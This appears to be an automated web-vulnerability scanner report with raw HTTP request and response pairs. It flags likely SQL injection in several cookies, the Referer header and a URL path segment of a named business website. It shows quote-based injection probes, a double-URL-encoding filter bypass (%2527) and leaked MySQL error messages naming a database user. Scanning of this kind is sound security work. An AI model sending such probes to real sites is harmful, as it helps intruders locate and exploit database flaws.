GET /resources/feeds.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/consulting.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a%2527%2527; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 08:00:08 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The optimizelyBuckets cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the optimizelyBuckets cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /resources/feeds.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/consulting.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D'; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:38:49 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /resources/feeds.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/consulting.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D''; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:38:50 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 04:38:52 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 04:38:52 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 19073
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /resources/feeds/34-gaac-blogs/12-canalytics-blog.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.google.com/search?hl=en&q=' Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 1 (redirected)
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 08:26:32 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /resources/feeds/34-gaac-blogs/12-canalytics-blog.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.google.com/search?hl=en&q='' Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 2 (redirected)
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 08:26:37 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 08:26:38 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 08:26:39 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 20977
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The __utmmobile cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmmobile cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the __utmmobile cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /resources/feeds/34-gaac-blogs/12-canalytics-blog.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/resources/feeds/34-gaac-blogs.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c%2527;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 05:00:17 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /resources/feeds/34-gaac-blogs/12-canalytics-blog.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/resources/feeds/34-gaac-blogs.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c%2527%2527;
Response 2
HTTP/1.1 301 Moved Permanently Date: Sat, 06 Nov 2010 05:00:17 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Location: http://www.analyticspros.com/index.php?option=com_newsfeeds&view=category&id=34:gaac-blogs Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8
The 1ee73a388da0bb7ec3d7afe3beccac53 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the 1ee73a388da0bb7ec3d7afe3beccac53 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /resources/feeds/34-gaac-blogs/13-portent-interactive-blog.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/resources/feeds/34-gaac-blogs.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00'; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 08:04:20 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /resources/feeds/34-gaac-blogs/13-portent-interactive-blog.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/resources/feeds/34-gaac-blogs.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00''; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 08:04:21 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 08:04:24 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 08:04:24 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22006
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The __utmz cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmz cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /resources/feeds/34-gaac-blogs/13-portent-interactive-blog.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/resources/feeds/34-gaac-blogs.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)'; 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 08:03:37 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /resources/feeds/34-gaac-blogs/13-portent-interactive-blog.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/resources/feeds/34-gaac-blogs.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)''; 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 08:03:37 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /resources/feeds/34-gaac-blogs/14-pure-visibility.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.google.com/search?hl=en&q=' Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:59:26 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 04:59:27 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 04:59:27 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22464
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The __utmz cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmz cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the __utmz cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /resources/feeds/34-gaac-blogs/14-pure-visibility.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/resources/feeds/34-gaac-blogs.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)%2527; 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:46:46 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /resources/feeds/34-gaac-blogs/14-pure-visibility.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/resources/feeds/34-gaac-blogs.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)%2527%2527; 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:46:47 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /resources/feeds/34-gaac-blogs'/15-roi-revolution-blog.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/resources/feeds/34-gaac-blogs.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 05:00:37 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /resources/feeds/34-gaac-blogs''/15-roi-revolution-blog.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/resources/feeds/34-gaac-blogs.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 05:00:37 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 05:00:39 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 05:00:39 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 24161
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
